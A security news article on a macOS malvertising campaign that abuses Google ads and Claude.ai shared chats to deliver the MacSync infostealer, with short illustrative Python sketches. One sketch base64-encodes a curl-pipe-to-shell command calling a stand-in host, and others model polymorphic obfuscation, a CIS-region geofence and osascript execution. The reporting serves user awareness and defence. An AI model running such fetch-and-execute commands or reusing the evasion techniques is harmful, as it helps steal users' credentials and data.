
Hackers abuse Google ads and Claude.ai to push Mac malware

A malvertising campaign targets macOS users via Google ads and weaponized Claude shared chats to install malware and steal browser data.

One of the more troubling shifts in macOS malware delivery is happening quietly: attackers are using Google Ads and legitimate Claude.ai shared chats to lure people into running commands that install malware.

The campaign targets users who search for phrases such as “Claude mac download.” Instead of steering victims to a fake download page, the sponsored results can appear to point to the real claude.ai domain. But the instructions embedded in weaponized shared chats tell users what to paste into Terminal, where the command chain ultimately downloads and executes malicious code on their Mac.

The activity was identified by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. He pointed to a specific Claude.ai shared chat that presents itself as an official “Claude Code on Mac” installation guide, complete with an attribution to “Apple Support.” While it looks like a helpful setup walkthrough, the steps guide users through opening Terminal and pasting a command that silently retrieves and runs malware.

While attempting to verify the report, a second Claude shared chat was found carrying out the same overall attack using different infrastructure. The two chats used an identical social-engineering pattern but differed in the domains referenced and the payloads delivered, indicating that the operators were running parallel versions to keep the campaign resilient.

The shared chats were publicly accessible at the time of reporting, and the key lure remained the same: a “legitimate” Claude interface used to deliver an installation-style prompt that leads to code execution on macOS.

For the Albayrak-identified variant, the base64-encoded instructions in the shared chat were designed to fetch an encoded shell script from attacker-controlled domains seen in security telemetry. Another variant observed in the separate investigation fetched a different shell-stage file from a different domain, with the overall mechanism still aimed at moving from “paste this command” to “run this silently.”
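
The core of the lure is that a base64-wrapped command reveals nothing about its behavior until decoded. The sketch below is a hypothetical, inert illustration of that pattern — the domain is a reserved `.invalid` name that will never resolve, and the string is not the actual command from the campaign:

```python
import base64

# What the victim sees in the chat is an opaque blob; only decoding it
# exposes the fetch-and-pipe-to-shell it conceals. Hypothetical command,
# inert domain — not the campaign's real payload string.
encoded = base64.b64encode(
    b"curl -fsSL https://payload.example.invalid/stage1 | sh"
).decode()

print(encoded)                               # opaque string pasted into Terminal
print(base64.b64decode(encoded).decode())    # the hidden download-and-execute chain
```

Wrapping the command this way costs the attacker nothing but defeats a casual reader who would balk at a visible `curl ... | sh`.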

That next-stage loader is described as a gzip-compressed shell script that executes from memory rather than leaving a clear application or traditional binary trail on disk. Adding to the evasion, the infrastructure served a uniquely obfuscated payload on each request, a behavior known as polymorphic delivery. The point is to make it harder for security tools to rely on known hashes or signatures for detection.
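
Why per-request obfuscation defeats hash-based detection can be shown in a few lines. This is a crude stand-in, not the attackers' actual scheme: it varies each copy by prepending a random comment line before gzip-compressing, so every download is byte-unique while behaving identically as a shell script:

```python
import gzip
import hashlib
import os

script = b"#!/bin/sh\necho stage-two\n"  # harmless stand-in for the real loader

def obfuscated_copy(payload: bytes) -> bytes:
    # Per-request variation: a random comment line changes the bytes
    # without changing the behavior of the decompressed script.
    junk = b"# " + os.urandom(8).hex().encode() + b"\n"
    return gzip.compress(junk + payload)

a = hashlib.sha256(obfuscated_copy(script)).hexdigest()
b = hashlib.sha256(obfuscated_copy(script)).hexdigest()
print(a == b)  # False: same behavior, a different hash on every request
```

Any blocklist keyed on the hash of one captured sample never matches the next download, which is why behavioral detection matters more here than signatures.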

In one observed variant, the script includes a region-based gate before it proceeds. It checks whether the machine has Russian or CIS-region keyboard input sources configured, and if that condition is met it exits early. On its way out, it sends a quiet status ping back to the attackers, effectively signaling which systems passed the first filter.
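
The gate's logic amounts to a substring match over configured input sources. The sketch below models it as a pure function; the layout-name list and function name are illustrative assumptions (on a real Mac the input sources would come from the `com.apple.HIToolbox` preferences), not the campaign's actual code:

```python
# Illustrative list of layout-name hints, not the attackers' exact criteria.
CIS_LAYOUT_HINTS = ("Russian", "Ukrainian", "Belarusian", "Kazakh")

def should_bail_out(input_sources: list[str]) -> bool:
    """Return True if any configured keyboard layout matches a CIS-region hint,
    mirroring the early-exit gate described above."""
    return any(hint in src for src in input_sources for hint in CIS_LAYOUT_HINTS)

print(should_bail_out(["com.apple.keylayout.US"]))       # False: infection proceeds
print(should_bail_out(["com.apple.keylayout.Russian"]))  # True: script exits early
```

This kind of geofence is a long-standing pattern in commodity infostealers, and the status ping turns even an aborted run into reconnaissance data.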

If the machine passes that check, the script collects information such as the victim’s external IP address, hostname, OS version, and keyboard locale, and sends it back to the attacker. This kind of pre-delivery profiling suggests the operators are not simply running a broad spray; they appear to be selecting targets based on system characteristics before proceeding.
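
The profile itself is a small stdlib-level fingerprint. The sketch below assembles the same categories of data locally and sends nothing anywhere; the fields that need network access or macOS-specific preference reads are stubbed out, and the structure is an assumption rather than the malware's real format:

```python
import platform
import socket

# Defensive, local-only illustration of the pre-delivery profile described
# above. Nothing is transmitted.
profile = {
    "hostname": socket.gethostname(),
    "os": platform.system(),
    "os_version": platform.release(),
    "external_ip": None,  # the real script queries an external service for this
    "kbd_locale": None,   # read from macOS input-source preferences in practice
}
print(profile)
```

That a few stdlib calls yield enough to triage victims is exactly why this step is cheap for the operators and invisible to the user.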

After the profiling step, the malware pulls a second-stage payload and executes it via osascript, leveraging macOS’s built-in scripting engine. That choice is significant: it can enable remote code execution while avoiding the need to drop a conventional app or binary file.
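
The execution primitive here is just `osascript -e`, which runs AppleScript (or JavaScript for Automation) supplied entirely on the command line. The sketch below builds such an invocation without running it; the helper name and the harmless notification one-liner are illustrative, not the campaign's actual second stage:

```python
# osascript runs a script passed inline via -e, so a payload can execute
# through a signed Apple binary without any app bundle touching disk.
def build_osascript_argv(applescript: str) -> list[str]:
    """Assemble (but do not execute) an osascript command line."""
    return ["/usr/bin/osascript", "-e", applescript]

argv = build_osascript_argv('display notification "hello" with title "demo"')
print(argv)
# On a Mac this would be executed with subprocess.run(argv, check=True);
# it is left unexecuted here deliberately.
```

Because `/usr/bin/osascript` ships with macOS and is Apple-signed, allowlisting approaches that key on executable provenance see nothing unusual — the malicious logic lives only in the argument string.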

The variant described by Albayrak is reported to skip the profiling steps and move directly to execution. Instead of first selecting targets, it harvests browser credentials, cookies, and macOS Keychain contents, then packages that information and exfiltrates it to the attacker. Albayrak identified this as a variant of the MacSync macOS infostealer, reinforcing the impression of a mature credential-theft operation behind the campaign.

The domains referenced in the shared chats were not static. In the case of the briskinternet domain shown in the Albayrak-linked variant, it appeared to be down at the time of writing, underscoring how attacker-controlled infrastructure can change quickly even during an active operation.

Malvertising has increasingly been used as a delivery mechanism for malware, and this campaign fits that pattern while also flipping a common expectation. In earlier similar incidents, the visible problem for users was typically a fake destination domain: an ad would look credible, but the link would lead to a lookalike phishing site. Here, there is no obvious counterfeit domain to spot in the ad itself.

Both Google Ads observed in this campaign point to Anthropic’s real domain, claude.ai, because the malicious content is embedded inside the platform’s own shared chat feature. In other words, the “destination” in the ad is genuine, but the content presented within that legitimate environment is weaponized to drive victims into executing commands.

It is not the first time attackers have abused shared chat features from AI platforms. In December, similar reporting described campaigns targeting ChatGPT and Grok users in a comparable way.

Security guidance from the reporting emphasized practical steps: users should navigate directly to claude.ai to download the native Claude app rather than relying on sponsored search results. The legitimate Claude Code CLI is available through Anthropic’s official documentation and does not require pasting commands from a chat interface.

More broadly, it remains a strong rule of thumb to treat any instructions asking you to paste Terminal commands with caution, even when the prompt appears to come from a place that looks official.

Anthropic and Google were contacted for comment prior to publication, reflecting how this kind of abuse sits at the intersection of ad ecosystems, user trust in legitimate platforms, and the growing misuse of AI-adjacent experiences for social engineering.

For macOS users, the lesson is less about which AI interface the attacker used and more about how quickly “helpful setup instructions” can become a shortcut to execution. When the next-stage payload runs in memory, changes its delivery shape, and optionally profiles the target before it acts, the safest approach is to avoid running commands obtained through a sponsored-result flow or a chat-based installation guide, especially ones attributed to familiar brands or support teams.

